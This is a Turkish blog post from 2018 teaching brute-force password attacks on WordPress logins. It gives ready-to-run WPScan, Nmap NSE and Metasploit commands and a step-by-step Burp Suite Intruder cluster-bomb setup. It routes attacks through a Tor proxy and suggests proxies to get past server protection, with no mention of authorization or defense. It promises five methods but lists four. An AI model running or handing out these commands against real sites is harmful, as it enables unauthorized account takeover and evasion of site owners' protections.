Newest Post
// On :29 Aralık 2018 Cumartesi
Bugün 5 farklı yolla wordpress sitelerine brute force ataklarını göstereceğim!
1-WPScan
2-Burp Süiti
3-Nmap
4-Metasploit
1-WPScan
WPScan, kali linux'a önceden yüklenmiş ve güvenlik açıklarını tarayan ve eklentiler ve temalar vb. Hakkında bilgi toplayan bir WordPress güvenlik tarayıcısıdır.
brute force atağı için iyi bir parola listesine sahip olmanız gerek
wpscan --url www.example.com --threads 1 --wordlist /usr/share/wordlists/parola.txt --username admin -v --random-agent --proxy socks5://127.0.0.1:9050
2-Burp Suite
POST verilerini yakalamak için tarayıcıyla burp suite proxy'i ayarlamanız gerekir, bunu Ayarlar > Tercihler > Gelişmiş > Ağ'a giderek yapabilirsiniz .
Şimdi, El ile proxy Yapılandırması'nı seçin ve yerel ana bilgisayar adresinizi HTTP proxy sekmesinde yazın ve bağlantı noktasını 8080 olarak ayarlayın . Tamam'ı tıklayın
Durdurmayı açtığınızda, burp suite'in yakalayabilmesi için tahminlerinizin herhangi bir şifresini yazın. Resme bakın, alınan satırdaki son satırı dikkat edin, sırasıyla admin: admin yazarak kullanıcı adı ve parola olarak giriş yapmaya çalıştığımı gösteriyor .
Yakalanan materyali, alana sağ tıklayarak ve Davetsiz misafire gönder seçeneğini seçerek davetsiz misafire gönderin veya sadece ctrl + i tuşlarına basın
Şimdi Pozisyonlar Sekmesine gidin.
Burada tüm POST verilerinizi seçmelisiniz ve önce sil düğmesine tıklayın .
Burada yönetici üzerine tıklamalısınız : admin ve kullanıcı adı ve şifre yüklerimiz için pozisyonlara eklemek için tıklayın.
Böylece artık yük taşıma pozisyonumuzu ekledik ve saldırı tipimizi küme bombası olarak değiştirdik. Şimdi Payloads sekmesine tıklayacağız.
Bu yük, kullanıcı adı içindir, hedeflenen site kullanıcı adını bilmiyorsanız, kullanıcı adınız için özel kelime listenizi ekleyebilir ve yük üzerine tıklayarak sözcük listesini yolundan yükleyebilirsiniz.
Bu yük, parola içindir ve özel kelimelerinizi yeni bir öğe olarak ekleyebilirsiniz veya özel kelime listenizi yükle tıklayarak yükleyebilirsiniz.
Artık yüklerimiz bitti ve “Saldırı Başlat” düğmesini tıklatarak saldırımıza başlayacağız.
3-Nmap
Nmap ayrıca bizim için bir ağ taraması ile brute force yapar
Popüler bir uygulamayı hedefliyorsanız, saldırılara yönelik NSE komut dosyaları olup olmadığını kontrol etmeyi unutmayın. Örneğin, WordPress kurulumları şu komut dosyası ile denetlenebilir http-wordpress-brute:
$ nmap -p80 --script http-wordpress-brute <target>
$ nmap -p80 --script http-wordpress-brute --script-args http-wordpress-brute.threads=5 <target>
sunucuda koruma varsa proxy kullanabilirsiniz
$ nmap -p80 --script http-wordpress-brute --script-args http-wordpress-brute.hostname="ahostname.wordpress.com" <target>
4-Metasploit
Metasploit, istismar etme, güvenlik açığı taraması, fuzzing ve yardımcı tarama ve daha birçok şey için kullanılabilecek harika bir araçtır.
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 127.0.0.1
msf auxiliary(wordpress_login_enum) > set rport 80
msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/parola.txt
msf auxiliary(wordpress_login_enum) > exploit
Kayıtlar
